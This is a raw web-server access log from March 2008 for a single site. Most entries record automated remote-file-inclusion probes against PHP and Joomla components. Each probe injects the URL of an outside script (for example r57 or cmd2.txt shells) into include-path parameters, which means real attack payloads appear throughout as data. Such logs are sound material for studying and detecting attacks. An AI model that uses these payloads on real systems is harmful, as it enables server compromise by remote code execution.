221.143.48.95 - - [30/Mar/2008:17:48:18 -0700] "GET /logs//header.php?abspath=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:17:48:18 -0700] "GET //header.php?abspath=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
72.30.216.98 - - [30/Mar/2008:17:49:56 -0700] "GET /logs/access.log HTTP/1.0" 200 26215 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:50:15 -0700] "GET /logs/access_080211.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:50:16 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:50:17 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:50:18 -0700] "GET /logs/access_080303.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.19.33.141 - - [30/Mar/2008:17:54:31 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=www.cypris.de/images/stories/frut/uploads/micid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.19.33.141 - - [30/Mar/2008:17:54:31 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=www.cypris.de/images/stories/frut/uploads/micid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.19.33.141 - - [30/Mar/2008:17:54:31 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=www.cypris.de/images/stories/frut/uploads/micid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:17:54:45 -0700] "GET /logs/access_080211.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:17:54:46 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:17:54:48 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:17:54:49 -0700] "GET /logs/access_080303.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:17:57:02 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:17:57:05 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
74.52.2.130 - - [30/Mar/2008:17:58:24 -0700] "GET /logs/access_080225.log/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.2.130 - - [30/Mar/2008:17:58:24 -0700] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:18:00:41 -0700] "GET /logs/access_080211.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:18:00:42 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:18:00:43 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:18:00:44 -0700] "GET /logs/access_080303.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.19.33.141 - - [30/Mar/2008:18:00:51 -0700] "GET /logs/access_080225.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=www.cypris.de/images/stories/frut/uploads/micid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.118.85.20 - - [30/Mar/2008:18:02:16 -0700] "GET //main.php?sayfa=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.163.169.99 - - [30/Mar/2008:18:04:14 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.2.130 - - [30/Mar/2008:18:04:30 -0700] "GET /logs/access_080211.log/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.118.85.20 - - [30/Mar/2008:18:06:23 -0700] "GET /logs/access.log//main.php?sayfa=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.118.85.20 - - [30/Mar/2008:18:06:23 -0700] "GET /logs//main.php?sayfa=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.30.226.156 - - [30/Mar/2008:18:07:35 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:08:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:08:56 -0700] "GET //appserv/main.php?appserv_root=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:09:33 -0700] "GET /logs/access_080225.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:09:34 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:09:34 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:10:08 -0700] "GET //?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:11:21 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:13:53 -0700] "GET /logs/access_080225.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:13:54 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:13:54 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:18:15:29 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:16:25 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:16:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:16:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:18:00 -0700] "GET /logs/access_080303.log//?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:18:00 -0700] "GET /logs//?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 200 4661 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:18:06 -0700] "GET /logs/access_080127.log//?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:19:56 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:19:57 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
74.200.90.19 - - [30/Mar/2008:18:20:25 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.19.178.201 - - [30/Mar/2008:18:24:38 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
84.19.178.201 - - [30/Mar/2008:18:24:43 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:24:44 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:24:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:24:50 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:25:03 -0700] "GET /logs//popup.php?include_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:25:03 -0700] "GET //popup.php?include_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:25:20 -0700] "GET /logs//index.php?themesdir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:18:25:22 -0700] "GET //index.php?themesdir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
84.19.178.201 - - [30/Mar/2008:18:26:52 -0700] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
84.19.178.201 - - [30/Mar/2008:18:26:55 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
193.221.122.60 - - [30/Mar/2008:18:30:27 -0700] "GET /!scanhttp://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.221.122.60 - - [30/Mar/2008:18:30:28 -0700] "GET /!scanhttp://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.30.216.109 - - [30/Mar/2008:18:31:51 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.200.90.19 - - [30/Mar/2008:18:32:58 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.200.90.19 - - [30/Mar/2008:18:32:58 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:33:26 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:37:41 -0700] "GET /logs/access_080225.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:37:42 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:37:43 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.30.216.102 - - [30/Mar/2008:18:37:45 -0700] "GET /logs/access_080128.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:39:35 -0700] "GET /logs/access_080303.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:39:35 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:18:39:36 -0700] "GET /logs/access_080127.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:39:56 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:41:34 -0700] "GET /logs/access_080303.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:42:45 -0700] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:42:48 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:18:42:52 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
62.141.50.208 - - [30/Mar/2008:18:43:27 -0700] "GET //amember/plugins/payment/secpay/config.inc.php//amember//plugins/payment/linkpoint/linkpoint.inc.php?config%5Broot_dir%5D=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
62.141.50.208 - - [30/Mar/2008:18:43:27 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php//amember//plugins/payment/linkpoint/linkpoint.inc.php?config%5Broot_dir%5D=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
92.48.74.30 - - [30/Mar/2008:18:43:55 -0700] "GET //plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
92.48.74.30 - - [30/Mar/2008:18:43:55 -0700] "GET /logs//plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
67.195.44.110 - - [30/Mar/2008:18:44:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.102 - - [30/Mar/2008:18:44:08 -0700] "GET /logs/access_080128.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
85.214.121.92 - - [30/Mar/2008:18:44:25 -0700] "GET //amember/plugins/payment/authorize_aim/authorize_aim.inc.php?config%5broot_dir%5d=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.toulouseangloexchange.com"
85.214.121.92 - - [30/Mar/2008:18:44:25 -0700] "GET /logs//amember/plugins/payment/authorize_aim/authorize_aim.inc.php?config%5broot_dir%5d=http://www.nswshop.com/sitemap/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:48:24 -0700] "GET /logs/access_080225.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:48:25 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:48:25 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:18:50:43 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
203.146.251.123 - - [30/Mar/2008:18:51:07 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [30/Mar/2008:18:51:08 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
203.146.251.123 - - [30/Mar/2008:18:51:08 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.195.44.92 - - [30/Mar/2008:18:52:33 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
203.146.251.123 - - [30/Mar/2008:18:54:18 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
209.62.80.134 - - [30/Mar/2008:18:55:04 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
209.62.80.134 - - [30/Mar/2008:18:55:04 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
216.184.96.158 - - [30/Mar/2008:18:57:33 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cct.vg/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
216.184.96.158 - - [30/Mar/2008:18:57:33 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cct.vg/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:18:57:43 -0700] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:18:57:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:18:57:43 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
